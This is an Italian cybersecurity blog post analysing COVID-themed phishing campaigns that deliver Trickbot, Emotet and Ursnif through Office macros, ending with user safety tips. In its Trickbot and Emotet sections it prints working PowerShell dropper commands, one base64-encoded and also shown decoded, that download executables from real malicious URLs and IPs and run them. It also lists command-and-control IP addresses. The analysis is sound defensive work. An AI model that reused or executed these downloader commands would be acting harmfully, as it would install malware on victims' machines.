logo

CybergON Blog

Advancing the State of Cybersecurity.

Il phishing ai tempi dello smartworking: un report sugli attacchi più diffusi

La diffusione del Covid-19 ha avuto un impatto enorme sulle nostre vite e sulla nostra economia, ma dove noi vediamo difficoltà e criticità, l’industria del Cybercrime vede un’occasione.

L’emergenza sanitaria infatti non è stata sufficiente per frenare campagne e tentativi di phishing. Al contrario, il numero di attacchi in questo periodo si è intensificato, approfittando anche della diffusa e obbligata tendenza allo smartworking, che in alcuni casi ci ha colto impreparati.

smartworking

Abbiamo svolto un’analisi dei più diffusi attacchi e mentre gli oggetti e i testi delle e-mail cambiano da caso a caso, possiamo affermare che i file e le infezioni che si nascondono all’interno dei messaggi sono piuttosto comuni e diffusi.

L’inizio degli attacchi e il picco di infezioni

Come segnalato dal CERT-PA (Computer Emergency Response Team per la pubblica amministrazione) nelle ultime settimane, gli attacchi hanno avuto inizio dai primi giorni di Marzo e si sono protratti per i successivi due mesi, fino ad ora, in cui si è avuto un picco di infezioni.

Gli oggetti delle mail in questione – bisogna dirlo – non sono particolarmente fantasiosi , tuttavia in un periodo di emergenza come questo possiamo immaginare che un utente poco attento o poco esperto sia incuriosito e spinto ad aprire una mail con un oggetto riguardante il tema più importante del momento. Per fare qualche esempio: abbiamo notizie di comunicazioni dall’oggetto “Corona virus cure for china, italy”; altri tentativi che,approfittando dell’intensa corsa agli acquisti online, fanno leva su oggetti come “Cancel shipment due to corona virus – new shipping details” o ancora “New COVID-19 prevention and treatment information” per comunicare presunte informazioni su prevenzioni e trattamenti da seguire.

Nonostante la varietà degli argomenti e dei contenuti delle mail, i malware veicolati attraverso gli allegati di queste comunicazioni sono già noti: Trickbot, Ursnif ed Emotet. Si tratta di malware in circolazione ormai da anni e che ciclicamente vengono ritoccati per provare a renderli non rintracciabili da soluzioni anti-malware.

Esempi e analisi delle mail di phishing in circolazione

Vediamo nello specifico alcuni esempi di mail malevole che trascinano con sé allegati in grado di infettare la macchina con uno dei malware sopra citati.

Esempio n°1: Trickbot

Il primo esempio è una mail dall’oggetto “Coronavirus: informazioni importanti su precauzioni” che sta circolando in queste settimane. L’e-mail, che pretende di contenere delle precauzioni, ha come allegato un documento word comunemente tipicamente nominato: “f21368535400.doc”, “Covid_19_test_form.doc”, “guida_coronavirus.doc”, ecc.

C’è più di una variante di questa mail e più di una variante dell’allegato annesso, ma il flusso è praticamente lo stesso: l’utente viene indotto ad aprire il documento e ad eseguire (volontariamente o involontariamente in base ai settaggi sull’abilitazione) delle macro. Il codice della macro esegue il download di un file - appartenente alla famiglia “Trickbot” - che ha il compito di infettare la macchina della vittima. Il documento word si presenta in questa maniera:

trickbot-word-document

In questo caso, l’utente viene ingannato e spinto ad abilitare e ad eseguire la macro. Il codice della macro è chiaramente offuscato ma, deoffuscandolo e facendo esplodere il file in una sandbox,

trickbot-codice-esploso-sandbox

il codice prova a collegarsi ad un server all’IP 37.1.212.70 attraverso il seguente comando:

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://37.1.212.70/doc/Cirilic.exe', 'C:' + '\U' + 'ser' + 's\P' + 'ub' + 'lic' + '\ca' + 'lc' + '.ex' + 'e')"

Prova quindi ad effettuare il download di un eseguibile per poi farlo girare sulla macchina per infettarla.

Esempio n°2: Emotet

Il secondo esempio che abbiamo analizzato è una mail che prova a diffondere Emotet. Il documento è simile, anche in questo mostra un messaggio che tende ad ingannare l’utente con l’accettazione di un license agreement:

emotet-word-document

Il codice anche in questo caso è offuscato, ma ciò che fa prima di tutto è cercare di contattare più di un IP, per verificare la presenza di connettività:

181.188.149.134

203.130.0.67

5.67.96.120

143.0.245.169

104.27.132.137

Lo scopo è effettuare il download dell’eseguibile necessario all’infezione della macchina vittima. In particolare, il comando eseguito è il seguente:

powershell –enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9AccAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4AlgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AywBvAG0AlwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8AlwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AywBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ArwB3AD0AjwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9AccAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AfoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=

C’è solo un livello di codifica e non è complicato individuare il codice nascosto e capirne lo scopo:

$jrFhA0='Wf1rHz';$uUMMLI = '284';$iBtj49N='ThMqW8s0';$FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe';$S9GzRstM='EFCwnlGz';$u8UAr3=&('n'+'ew'+'-object') NeT.wEBClIEnt;$pLjBqINE='http://blockchainjoblist.com/wp-admin/014080/@https://womenempowermentpakistan.com/wp-admin/paba5q52/@https://atnimanvilla.com/wp-content/073735/@https://yeuquynhnhai.com/upload/41830/@https://deepikarai.com/js/4bzs6/'."sPL`iT"('@');$l4sJloGw='zISjEmiP';foreach($V3hEPMMZ in $pLjBqINE){try{$u8UAr3."DOw`N`lOaDfi`Le"($V3hEPMMZ, $FwcAJs6);$IvHHwRib='s5Ts_iP8';If ((&('G'+'e'+'t-Item') $FwcAJs6)."LeN`gTh" -ge 23931) {[Diagnostics.Process]::"ST`ArT"($FwcAJs6);$zDNs8wi='F3Wwo0';break;$TTJptXB='ijlWhCzP'}}catch{}}$vZzi_uAp='aEBtpj4'

Il codice prova a comunicare con l’IP 181.188.149.134 che è segnalato su AbuseIPDB come CnC server di Emotet da cui prova a scaricare un fila dal nome “284.exe” che,chiaramente, è un eseguibile malevolo.

Esempio n°3: Ursnif

Il terzo malware è l’ultimo tra i più diffusi, Ursnif, veicolato attraverso mail dall’oggetto “Invio COPIA Ordine/Fattura: Procedure x Coronavirus”. La mail invita la vittima a scaricare un file Excel in allegato che, come gli altri, contiene una macro vba.

ursnif-excel-document

Parte del codice offuscato è il seguente:

ursnif-codice-esploso-sandbox-1

Sono presenti vari livelli di compressione (gzip, base64 e dati binari) ma deoffuscando ogni livello ciò che si ottiene è qualcosa che ci permette di comprendere il comportamento della macro.

ursnif-codice-esploso-sandbox-2 ursnif-codice-esploso-sandbox-3

Il codice prova a contattare differenti IP tra cui:

23.227.199.36

52.109.2.16

72.21.91.29

15133 US

52.109.124.20

Con l’obiettivo ultimo di infettare e diffondere il malware.

Le precauzioni da adottare

Questi sono tre esempi di malware già noti e tornati alla ribalta anche durante e grazie a questa pandemia. Non sono però gli unici casi: ricordiamo anche quello di Blackwater o la campagna specifiche per utenti Android.

In situazioni come queste, le precauzioni in qualità di utente che consigliamo di adottare sono quelle più semplici ma non per questo banali:

  • E’ buona norma controllare l’indirizzo del mittente per rendersi conto se sia o meno plausibile sfruttare tool online per verificarne la reputazione nel caso in cui non lo si conosca, ad esempio: Cisco Talos; Senderscore; MxToolbox;

  • Non scaricare file in allegato o file a cui si viene condotti tramite link, se proprio necessario sfruttare piattaforme che effettuano gratuitamente l’analisi di file, come Virustotal;

  • Non cliccare link senza essersi prima accertati della bontà dell’e-mail;

  • Chiedere a qualche collega se ha già ricevuto una mail dello stesso tipo o informarsi su Internet circa campagna caratterizzate dallo stesso oggetto dell’e-mail ricevuta.

Hai un attacco in corso? Contattaci su shockwave@cybergon.com